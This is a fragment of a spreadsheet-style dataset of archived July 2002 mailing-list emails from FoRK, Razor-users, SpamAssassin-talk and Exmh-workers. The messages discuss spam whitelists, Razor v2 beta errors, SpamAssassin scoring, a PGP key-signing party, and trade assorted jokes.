--==_Exmh_1643180900P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;eugen@leitl.org&gt;\nFrom: &lt;bitbitch@magnesium.net&gt;\nDate: Wed, 24 Jul 2002 10:35:44 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 10:35:44 -0700 (PDT)</t>
  </si>
  <si>
    <t>&lt;eugen@leitl.org&gt;</t>
  </si>
  <si>
    <t>email.  I could see certain friends of mine getting fairly annoyed &gt;&gt; (especially those with multiple email addresses...). &gt; &gt; What's the point of multiple email addresses? They're a pain. &gt; Ah the great spam debate wages on ... So where's Kragen in this whole mess ;-) Eugen, the reason for multiple email addresses (at least _my_ reason) is that I like to separate my friends from say, FoRK, from say, my school accounts, from say my spam box.   I tend to get a veritable buttload of mail from various sources, and sometimes I don't have a chance to go through it all.   I have it mostly setup on a filter basis (those friends that go to the carey@ address do get filtered _generally_ speaking into the friends box, those fork posts, _generally_ go into the FoRK pile. )   Its still nice to know that if I need to get someone's response and I haven't gotten around to putting them into the friends section of my carey@ address, that I can give them another address (bitbitch, which gets considerably less traffic) and I can be assured of flagging it down. When I setup my PC to run BSD and then I can get sendmail or procmail or whatnot to be a better mail program and  I can spend the time making even _better_ filters than The Bat! provides for me now, I'll probably change my mind on the multiple email address thing.   I still like knowing that I can send the assholes (or undesirable guys I don't feel like dating ;)  to my @hotmail account. I'm also going to also rescind my prior request not to have a member-only fork.   As snobby and elitist as a member-only FoRK would be, I'm starting to feel the pain of the whole spam to bits ratio on fork.   I'd be willing, multiple email addresses and all, to sign up for a whitelist provided the system could handle email sent from say cnn.com that was referenced to my address (say the On Behalf of) emails that a few of us tend to send.   Does such a system exist?  I'm rather ignorant on the whole whitelist concept, and I know a few of you are far far more knowledgable. My half a cent here... : I will be so damn glad when I am done with this whole moving thing... back on fork when I'm in NH.. :) Woo hoo!   Law school!)    [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Flatware or Road Kill? &lt;FoRK@xent.com&gt;\nFrom: Rodent of Unusual Size &lt;Ken.Coar@Golux.Com&gt;\nDate: Wed, 24 Jul 2002 10:33:59 -0400</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 10:33:59 -0400</t>
  </si>
  <si>
    <t>At a pub frequented by the members of the EU translator corps,\na Spanish translator and an Irish translator start comparing\nnotes.  The Spanish translator asks, "Is there anything in Irish\nGaelic which corresponds to 'maana'?"  The Irishman thinks for\na moment, fortified by a long pull at his pint, and finally\nresponds, "Yes -- but it doesn't have the same sense of terrible\nurgency."\n-- \n#ken	P-)}\n\nKen Coar, Sanagendamgagwedweinini  [URL]http://Golux.Com[/URL]\nAuthor, developer, opinionist      [URL]http://Apache-Server.Com[/URL]\n\n"Millennium hand and shrimp!"\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://Golux.Com http://Apache-Server.Com http://xent.com</t>
  </si>
  <si>
    <t>To: Patrick &lt;patrick@stealthgeeks.net&gt;\nFrom: Vipul Ved Prakash &lt;mail@vipul.net&gt;\nDate: Wed, 24 Jul 2002 10:31:32 -0700</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 10:31:32 -0700</t>
  </si>
  <si>
    <t>Patrick &lt;patrick@stealthgeeks.net&gt;</t>
  </si>
  <si>
    <t>At this instance there are several thousand happy users of the Razor v2\nsystem. The code is still officially in Beta, but the first stable release\nis around the corner. If you are seeing problems, download the latest\nversion; most likely the problem has been fixed already, if not, send a\nbug report to razor-testers@lists.sf.net or to chad@cloudmark.com\n\ncheers,\nvipul.\n\nOn Wed, Jul 24, 2002 at 10:02:51AM -0700, Patrick wrote:\n&gt; On Wed, 24 Jul 2002, rODbegbie wrote:\n&gt; \n&gt; &gt; rODbegbie wrote:\n&gt; &gt; &gt; I get the impression that Vipul &amp; co are deliberately trying to\n&gt; &gt; &gt; mislead users into downloading the dev code in order to get more\n&gt; &gt; &gt; unwitting test sites.\n&gt; &gt;\n&gt; &gt; Apologies to all.  In re-reading, that sentence sounds a lot harsher than I\n&gt; &gt; intended.\n&gt; \n&gt; The question I have is: what needs to be done/help needs to be provided to\n&gt; make the system suck less? It's obviously a great idea, it just needs some\n&gt; work...\n&gt; \n&gt; /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\\n&gt;                                Patrick Greenwell\n&gt;          Asking the wrong questions is the leading cause of wrong answers\n&gt; \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n&gt; \n&gt; \n&gt; \n&gt; -------------------------------------------------------\n&gt; This sf.net email is sponsored by:ThinkGeek\n&gt; Welcome to geek heaven.\n&gt; [URL]http://thinkgeek.com[/URL]\n&gt; _______________________________________________\n&gt; Razor-users mailing list\n&gt; Razor-users@lists.sourceforge.net\n&gt; [URL]https://lists.sourceforge.net[/URL]\n\n-- \n\nVipul Ved Prakash          |   "The future is here, it's just not \nSoftware Design Artist     |    widely distributed."\n[URL]http://vipul.net[/URL]          |              -- William Gibson\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://thinkgeek.com https://lists.sourceforge.net http://vipul.net http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: nan\nFrom: Lucas Gonze &lt;lgonze@panix.com&gt;\nDate: Wed, 24 Jul 2002 10:27:32 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 10:27:32 -0400 (EDT)</t>
  </si>
  <si>
    <t/>
  </si>
  <si>
    <t>Music school jokes --\n\nAmerican conductor and European conductor are talking.  European conductor \nsays "what a week, I've had 5 rehearsals and a performance."  "That's \nnothing," says the American conductor, "I've had five performances and a \nrehearsal."  \n\nWhat's the difference between a spring in the desert surrounded by palm \ntrees and a violist that plays in tune?  A violist that plays in tune is a \nmirage.\n\nWhat's the difference between a rat and a guitar player?  The rat's got \nsomething to do tonight.\n\nGood thing it's not comedy school.\n\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Anders Eriksson &lt;aeriksson@fastmail.fm&gt;\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Wed, 24 Jul 2002 10:23:47 -0500</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 10:23:47 -0500</t>
  </si>
  <si>
    <t>--==_Exmh_1600470190P Content-Type: text/plain; charset=us-ascii &gt; From:  Anders Eriksson  &gt; Date:  Wed, 24 Jul 2002 11:34:52 +0200 &gt; &gt; The following patch removes Ftoc_RescanLine in favour of a  &gt; Ftoc_RescanLines. It runs scan(1) on a list of lines and updates ftoc  &gt; accordingly. The patch also changes all the callers to make use of it. &gt;  &gt; It also changes Ftoc_ClearCurrent to work of an argument instead of  &gt; falsily clearing a message that's still Current on disk. All in an  &gt; effort to get a one-to-one disk-display correspondence. &gt;  &gt; It does add ~30 -- ~ 75 ms (~&lt;10%) to the execution time depending on  &gt; folder size due to the invocation of scan. However this version does  &gt; not try to second guess the mh version of scan so if you have exotic  &gt; scanlines it tells the truth. As a side effect the '+' sign now  &gt; corresponds better to what's on disk. &gt;  &gt; Comments appreciated. I'm going to be offlike for a couple of days,  &gt; so I send the cvs diff rather than putting it in the cvs. Okay, I've just patched and sourced it into my running exmh, so I'll let you  know if anything breaks. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_1600470190P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9PsaDK9b4h5R0IUIRAlnZAJ9uyst86+8R7mzxf3yWJeNv9AHe6ACdHAeC IkGCzBzaFuPg7EWgIeLNEJM= =0S4w -----END PGP SIGNATURE----- --==_Exmh_1600470190P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Patrick &lt;patrick@stealthgeeks.net&gt;\nFrom: "Tabor J. Wells" &lt;razor-users@fsckit.net&gt;\nDate: Wed, 24 Jul 2002 10:13:40 -0400</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 10:13:40 -0400</t>
  </si>
  <si>
    <t>On Tue, Jul 23, 2002 at 09:21:58PM -0700, Patrick  is thought to have said: &gt; Today's error(received multiple times) was: &gt;  &gt; Jul 23 21:16:39.288680 report[98557]: [ 2]  Razor-Agents v2.12 starting &gt; razor-report ./jobspam &gt; Jul 23 21:16:46.597147 report[98558]: [ 1] razor-report error: reportit: &gt; Error 213 while authenticating, aborting. I believe this is fixed (or at least there's a workaround in place to try again) in 2.125 &gt; I really like the concept of Razor but I find myself wondering if it's &gt; really a good idea for the developers to be passing off what appears &gt; to be alpha-quality software as production-ready.... And where does it say production-ready? [URL]http://razor.sourceforge.net[/URL] says at the top of the page: June 13, 2002 - Vipul's Razor v2 released! The first beta of Vipul's Razor v2 is now available for public download. Likewise Vipul's announcement post about v2 to this list states that it is  beta in the first sentence. Tabor --  -------------------------------------------------------------------- Tabor J. Wells                                razor-users@fsckit.net Fsck It!                 Just another victim of the ambient morality ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://razor.sourceforge.net http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: Eugen Leitl &lt;eugen@leitl.org&gt;\nFrom: Mike Masnick &lt;mike@techdirt.com&gt;\nDate: Wed, 24 Jul 2002 10:09:33 -0700</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 10:09:33 -0700</t>
  </si>
  <si>
    <t>At 11:49 AM 7/24/02 +0200, Eugen Leitl wrote:\n&gt;On Tue, 23 Jul 2002, Mike Masnick wrote:\n&gt;\n&gt;&gt; Lately, a fairly large % of the spam I've been getting has been coming\n&gt;&gt; from spam systems that forge my own address as the "from" address...\n&gt;\n&gt;Include a random token with an expiration date with anything you send.  \n&gt;Valid whitelisting of From:you@here.net yet invalid random token would get \n&gt;blocked.\n\nAdds to the level of annoyance, and makes it even less likely that I'll\never use it.\n\n&gt;&gt; Those spam messages would get through any whitelist I set up\n&gt;&gt; (especially since I email stuff to myself all the time).  If\n&gt;&gt; whitelists become more popular, I imagine spammers will resort to\n&gt;&gt; doing that for the majority of their spams, making whitelists less\n&gt;&gt; helpful.\n&gt;\n&gt;Spammers cannot be bothered to keep track if individual whitelists \n&gt;associated with a given email address.\n\nThey don't have to.  All they have to do is use some program (which, if\nthey don't exist already, will certainly be around someday soon) that makes\nevery spam they send show the recipient as the "from" address as well.\n\n&gt;&gt; Plus, I'm still not sure how I feel about whitelists.  I don't think I'm so\n&gt;&gt; special that people should need to fill out a special form just to send me\n&gt;\n&gt;Of course you populate your whitelist with contents of your inbox minus \n&gt;spam, and then add manually stuff from your addressbook.\n\nThe adding manually thing doesn't seem like much fun.  And, anytime I speak\nto someone new, it just makes it more unlikely that they will be willing to\ncontact me.  Having played around with whitelists in the past, you'd be\namazed at how confused many people get by them as well.  They tend to\nignore the "please apply" messages.\n\nAs an aside, am I the only person around who simply does not use the\naddressbook feature in email programs?  I never have, and I don't see any\nreason to.  It (along with not opening attachments) has helped me not to\nsend out viruses to people.  I generally use my own brain or my inbox as an\naddressbook, and search out the last email I received from someone and hit\nreply...\n\n&gt;&gt; email.  I could see certain friends of mine getting fairly annoyed\n&gt;&gt; (especially those with multiple email addresses...).\n&gt;\n&gt;What's the point of multiple email addresses? They're a pain.\n\nWell, yes.  *I* use one email address, but that doesn't mean all my friends\ndo.  You would need to convince everyone I know of that.  Most people I\nknow, at the very least, have a home and work email address.  But plenty\nothers have other addresses for various reasons.  Keeping track of all of\nthem for a whitelist seems like a pain.  It forces them to remember which\nemail addresses are already approved and avoid using others.\n\nPlus, I know plenty of people who change jobs, and suddenly get a new email\naddress from their new job.  Wouldn't it suck if, in sending out your new\njob info, you had to fill out a new application for each friend just to\ntell them about your new job email address?\n\n -Mike\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: rODbegbie &lt;rOD@arsecandle.org&gt;\nFrom: Patrick &lt;patrick@stealthgeeks.net&gt;\nDate: Wed, 24 Jul 2002 10:02:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 10:02:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>rODbegbie &lt;rOD@arsecandle.org&gt;</t>
  </si>
  <si>
    <t>On Wed, 24 Jul 2002, rODbegbie wrote:\n\n&gt; rODbegbie wrote:\n&gt; &gt; I get the impression that Vipul &amp; co are deliberately trying to\n&gt; &gt; mislead users into downloading the dev code in order to get more\n&gt; &gt; unwitting test sites.\n&gt;\n&gt; Apologies to all.  In re-reading, that sentence sounds a lot harsher than I\n&gt; intended.\n\nThe question I have is: what needs to be done/help needs to be provided to\nmake the system suck less? It's obviously a great idea, it just needs some\nwork...\n\n/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\\n                               Patrick Greenwell\n         Asking the wrong questions is the leading cause of wrong answers\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: Theo Van Dinter &lt;felicity@kluge.net&gt;,\nFrom: Kevin Gagel &lt;gagel@cnc.bc.ca&gt;\nDate: Wed, 24 Jul 2002 09:15:53 -0700</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 09:15:53 -0700</t>
  </si>
  <si>
    <t>Kevin Gagel &lt;gagel@cnc.bc.ca&gt;</t>
  </si>
  <si>
    <t>Theo Van Dinter &lt;felicity@kluge.net&gt;,</t>
  </si>
  <si>
    <t>Re: [SAtalk] Spam through - insanefunnies - clairification of X-Spam-Status fi elds?</t>
  </si>
  <si>
    <t>Amis-v or there is another prefs file that SA is using. I had a heck of a time\nfiguring out where to find my site wide file because of my configuration.\n\nIf your using spamd and you want your users to have some control using\nuser_prefs then check their ~/spamassassin file.\nIf your using spamd and you have a site wide only policy then make sure that\nspamd is started with the -x option.\nIf you used the -x option then the only place that it should get the rules from\nwould be from the local.cf in the /etc/mail/spamassassin directory. Assuming a\ndefault install.\n\nTheo Van Dinter wrote:\n&gt; \n&gt; On Wed, Jul 24, 2002 at 10:18:28AM -0500, Stewart, John wrote:\n&gt; &gt; X-Virus-Scanned: by amavisd-new amavisd-new-20020630\n&gt; &gt; X-Spam-Status: No, hits=6.5 tagged_above=5.1 required=6.9 tests=PLING,\n&gt; &gt; MONEY_BACK, CLICK_BELOW, POR\n&gt; &gt; N_14, CLICK_HERE_LINK, FREQ_SPAM_PHRASE\n&gt; &gt; X-Razor-id: d92173a8dfc60567e55efcf6bf264fd7f7a7369a\n&gt; &gt;\n&gt; &gt; Doesn't hits=6.5 mean that it should be tagged as spam? Why the\n&gt; &gt; X-Spam-Status of no then?\n&gt; \n&gt; required is 6.9, it only scored 6.5, so it's not spam according to SA.\n&gt; \n&gt; &gt; Why is required=6.9 if I have required_hits at 5 in the local.cf? Where the\n&gt; &gt; heck does that number come from?\n&gt; &gt;\n&gt; &gt; Also, what is tagged_above=? I cannot find any information about it on the\n&gt; &gt; SpamAssassin site.\n&gt; \n&gt; Good questions...  "tagged_above" doesn't appear anywhere in SA (at\n&gt; least according to `find`).  I would guess it's amavis doing some\n&gt; hacking around.\n&gt; \n&gt; --\n&gt; Randomly Generated Tagline:\n&gt; D'oh!  English!  Who needs that?  I'm never going to England. Come on,\n&gt;  let's smoke.\n&gt; \n&gt;                 -- Homer Simpson, talking Barney into cutting class\n&gt;                    The Way We Was\n&gt; \n&gt; -------------------------------------------------------\n&gt; This sf.net email is sponsored by:ThinkGeek\n&gt; Welcome to geek heaven.\n&gt; [URL]http://thinkgeek.com[/URL]\n&gt; _______________________________________________\n&gt; Spamassassin-talk mailing list\n&gt; Spamassassin-talk@lists.sourceforge.net\n&gt; [URL]https://lists.sourceforge.net[/URL]\n\n-- \n========================\nKevin W. Gagel\nNetwork Administrator\nCollege of New Caledonia\ngagel@cnc.bc.ca\npostmaster@cnc.bc.ca\n(250)562-2131 loc. 448\n========================\n\n--------------------------------\nThe College of New Caledonia    \nVisit us at [URL]http://www.cnc.bc.ca[/URL]\n--------------------------------\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://thinkgeek.com https://lists.sourceforge.net http://www.cnc.bc.ca http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: dl@silcom.com, fork@spamassassin.taint.org\nFrom: ThosStew@aol.com\nDate: Wed, 24 Jul 2002 09:08:12 EDT</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 09:08:12 EDT</t>
  </si>
  <si>
    <t>ThosStew@aol.com</t>
  </si>
  <si>
    <t>dl@silcom.com, fork@spamassassin.taint.org</t>
  </si>
  <si>
    <t>In a message dated 7/23/2002 6:02:27 PM, dl@silcom.com writes:\n\n&gt;If we're willing to count artificial\n&gt;selection as genetic engineering, \n\nOf course was genetic engineering. It used the fundamental mechanism of \ngenetics (inheritance of traits), and not randomly, but \nintentionally--breeding for long fur, fat hams, whatever. The degree to which \nthe engineers--farmers, breeders--understood exactly how the mehcanism works \nis only marginally relevant to the question of whether it was engineering. \nScience progresses. Over the years, centuries, their, our, knowledge \nincreased, and domestication became more effective. Bit by bit the mechanisms \nbecame known--Mendel making a major breakthrough. The first hybrid grains \n(which date from the 1920s) represent another step. Watson and Crick another, \netc. But it's engineering--just as Roman architecture was civil engineering, \neven if they knew less about the mathematics behind it than we do today, just \nas Galen was a physician, though laughably ignorant by our standards.\n\nT\n\nTom\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: FoRK@xent.com\nFrom: ThosStew@aol.com\nDate: Wed, 24 Jul 2002 09:08:11 EDT</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 09:08:11 EDT</t>
  </si>
  <si>
    <t>FoRK@xent.com</t>
  </si>
  <si>
    <t>In a message dated 7/23/2002 8:45:18 PM, ejw@cse.ucsc.edu writes:\n\n&gt;Pastry is a generic, scalable and efficient substrate for peer-to-peer\n&gt;applications. Pastry nodes form a decentralized, self-organizing and\n&gt;fault-tolerant overlay network within the Internet. \n\nIs it made with lard, butter, or vegetable shortenings? \n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Cypherpunks &lt;cypherpunks@lne.com&gt;\nFrom: Mark Renouf &lt;mark@tweakt.net&gt;\nDate: Wed, 24 Jul 2002 09:05:23 -0400</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 09:05:23 -0400</t>
  </si>
  <si>
    <t>Mark Renouf &lt;mark@tweakt.net&gt;</t>
  </si>
  <si>
    <t>Cypherpunks &lt;cypherpunks@lne.com&gt;</t>
  </si>
  <si>
    <t>Defcon key-signing party</t>
  </si>
  <si>
    <t>Anyone interested in a pgp/gpg key-signing get-together @ DC, please email me your key info (name, key ID, type, size, fingerprint), and I will add you to the list. If you don't have a PGP key, now is a great time to make one. Want to find out more about PGP? You can get the software from: PGPfreeware  GnuPG (GPG)  Bring the following:    *  Photo ID (your name must be in your key identity)    *  A printed copy of your key ID, key type, fingerprint, and key size I will pass out a master list (from what people send me now). Then individually we will cross-validate eachothers identities and keys. It works like this: person A tells B the details of their key (from their personal copy of the key info). Person B confirms that the key information on the master list matches. Next person A produces photo ID for person B. If it proves that person A is the owner of the key, then person B can check off that person on their list. The reverse is then done for person B. After a while you will end up with a list full of (hopefully) checked names. Later on, you can retrieve a copy of the key either from a keyserver or directly from the owner, verify it's valid (it matches the checked off name on your copy of the master list), and sign it using your private key. Then you can upload your signature of the key to a key server and send a copy back to the key's owner to add to thier keyring. ID:    Mark Renouf  Size:  2048 Type:  DH/DSS KeyID: 0xF888F464 Fingerprint: 9CE7 98DD E14E 8B9C 7109  2798 C18D 83A9 F888 F464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To: dl@silcom.com, fork@spamassassin.taint.org\nFrom: ThosStew@aol.com\nDate: Wed, 24 Jul 2002 08:54:09 EDT</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 08:54:09 EDT</t>
  </si>
  <si>
    <t>In a message dated 7/23/2002 6:02:27 PM, dl@silcom.com writes:\n\n&gt;If we're willing to count artificial\n&gt;selection as genetic engineering, \n\nit's engineering that uses the general mechanism of genetics (inheritance of \ntraits) without understanding the specific mechanisms (genes, DNA, etc.). \n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: joe@barrera.org, harley@corton.inria.fr\nFrom: ThosStew@aol.com\nDate: Wed, 24 Jul 2002 08:54:07 EDT</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 08:54:07 EDT</t>
  </si>
  <si>
    <t>joe@barrera.org, harley@corton.inria.fr</t>
  </si>
  <si>
    <t>In a message dated 7/23/2002 8:51:00 PM, joe@barrera.org writes:\n\n&gt;Okay, here's a joke I *just* made up while I was driving my car at home:\n\n\nJoe, I think you need a new car with more leg room\n\nTom\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: nan\nFrom: ThosStew@aol.com\nDate: Wed, 24 Jul 2002 08:53:59 EDT</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 08:53:59 EDT</t>
  </si>
  <si>
    <t>Xander Blakley quotes a Russian joke in his terrific book _Siberia Bound_. \nFrenchman, American, and Russian get to talking bout which country has the \nmore desireable women. Frenchman says, "Ah, when a Frenchman puts his hands \naround zee waist of his lover, his fingers form a complete circle and \ntouch--not because his hands are so large, but because zee  French woman's \nwaist is so slender."\n    American says "Yep, but when an American woman gets on a horse, her heels \nreach all the way down to the ground--and it's not because American horses \nare short, but because American women have such endlessly long, sexy legs."\n    Russian says: "Da, but when a Russian slaps his wife's ass on his way out \nof the house in the morning, it's still jiggling when he comes back after \nwork--and it's not because her ass is so big, but because the Russian work \nday is so short."\n\nTom\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: joele@iws-irms.com\nFrom: Olivier Nicole &lt;Olivier.Nicole@ait.ac.th&gt;\nDate: Wed, 24 Jul 2002 08:43:50 +0700 (ICT)</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 08:43:50 +0700 (ICT)</t>
  </si>
  <si>
    <t>Olivier Nicole &lt;Olivier.Nicole@ait.ac.th&gt;</t>
  </si>
  <si>
    <t>joele@iws-irms.com</t>
  </si>
  <si>
    <t>Re: [SAtalk] Reporting....</t>
  </si>
  <si>
    <t>&gt;I currently have spam being filtered for about 50 users via spamd.\n&gt;Works perfectly!  However, is there anyone out there providing reports\n&gt;to their users about what was filetered?  Maybe just something like\n&gt;date/time, From, and subject?\n\nYup! You can check: [URL]http://www.cs.ait.ac.th[/URL]\n\nThough it uses procmail!\n\nOlivier\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.cs.ait.ac.th http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>THA</t>
  </si>
  <si>
    <t>To: "Tabor J. Wells" &lt;razor-users@fsckit.net&gt;\nFrom: Patrick &lt;patrick@stealthgeeks.net&gt;\nDate: Wed, 24 Jul 2002 08:27:27 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 08:27:27 -0700 (PDT)</t>
  </si>
  <si>
    <t>On Wed, 24 Jul 2002, Tabor J. Wells wrote: &gt; On Tue, Jul 23, 2002 at 09:21:58PM -0700, &gt; Patrick  is thought to have said: &gt; &gt; &gt; Today's error(received multiple times) was: &gt; &gt; &gt; &gt; Jul 23 21:16:39.288680 report[98557]: [ 2]  Razor-Agents v2.12 starting &gt; &gt; razor-report ./jobspam &gt; &gt; Jul 23 21:16:46.597147 report[98558]: [ 1] razor-report error: reportit: &gt; &gt; Error 213 while authenticating, aborting. &gt; &gt; I believe this is fixed (or at least there's a workaround in place to try &gt; again) in 2.125 Thanks. &gt; &gt; I really like the concept of Razor but I find myself wondering if it's &gt; &gt; really a good idea for the developers to be passing off what appears &gt; &gt; to be alpha-quality software as production-ready.... &gt; &gt; And where does it say production-ready? [URL]http://razor.sourceforge.net[/URL] says at &gt; the top of the page: &gt; &gt; June 13, 2002 - Vipul's Razor v2 released! The first beta of Vipul's Razor &gt; v2 is now available for public download. &gt; &gt; Likewise Vipul's announcement post about v2 to this list states that it is &gt; beta in the first sentence. I sit corrected. I guess we could argue if it's even beta quality(I'd say I have about a 50/50 chance of reports being submitted), but I don't think that would be productive. :-) /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\                                Patrick Greenwell          Asking the wrong questions is the leading cause of wrong answers \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Wayne E Baisley &lt;baisley@alumni.rice.edu&gt;\nDate: Wed, 24 Jul 2002 08:06:40 -0500</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 08:06:40 -0500</t>
  </si>
  <si>
    <t>Wayne E Baisley &lt;baisley@alumni.rice.edu&gt;</t>
  </si>
  <si>
    <t>&gt; it's engineering that uses the general mechanism of genetics (inheritance of \n&gt; traits) without understanding the specific mechanisms (genes, DNA, etc.).\n\n\nAh, like the way we used to make babies.  And wine.  And war.\n\nCheers,\nWayne\n\nAnd anagrams.\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Joe Berry &lt;joe@topshot.com&gt;\nDate: Wed, 24 Jul 2002 08:02:32 -0400</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 08:02:32 -0400</t>
  </si>
  <si>
    <t>Joe Berry &lt;joe@topshot.com&gt;</t>
  </si>
  <si>
    <t>[Razor-users] Something wrong with Database?</t>
  </si>
  <si>
    <t>Until a few days ago, razor (sdk 2.03, client 2.12) was catching a\ndecent set of spams.  It seems now, however, that it isn't catching\nanything.  I got one email this morning with "ADV:" in the subject\nanother two or three about how many inches longer I can be.  Did I\nmiss something recently perhaps regarding configuration changes, etc?\n\nThanks in advance,\n\nJoe\n---\nJoe Berry\njoe@topshot.com\nAIM "joe topshot"\nYahoo Msgr "joetopshot"\nBaltimore, MD\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: "" Angles " Puglisi" &lt;angles@aminvestments.com&gt;\nDate: Wed, 24 Jul 2002 07:56:27 +0000</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 07:56:27 +0000</t>
  </si>
  <si>
    <t>Re: central management</t>
  </si>
  <si>
    <t>I build a lot of rpms but I'm to stupid/busy to "apt-ize" what I have. I wish it was apt enabled because I have several boxen and apt would help even with rpms that I build. Did I mention forgetful too? [URL]http://www.dudex.net[/URL] che (che666@uni.de) wrote*: &gt; &gt;hello! &gt;well in my eyes something like a public contrib repository would be nice (where everyone can at least upload spec files) and a something like a "repository directory" with a collection of available repositorys and their content. &gt; &gt;i am personally on a dsl dialup connection with 16kb/s upstream cap and that kinda sucks perhaps i am gonna still create a respository for small windowmaker dockapps in the future :). &gt; &gt;what do you think? &gt; &gt;thanks, &gt;che &gt; &gt;_______________________________________________ &gt;RPM-List mailing list  &gt; -- That's "angle" as in geometry. _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://www.dudex.net http://lists.freshrpms.net</t>
  </si>
  <si>
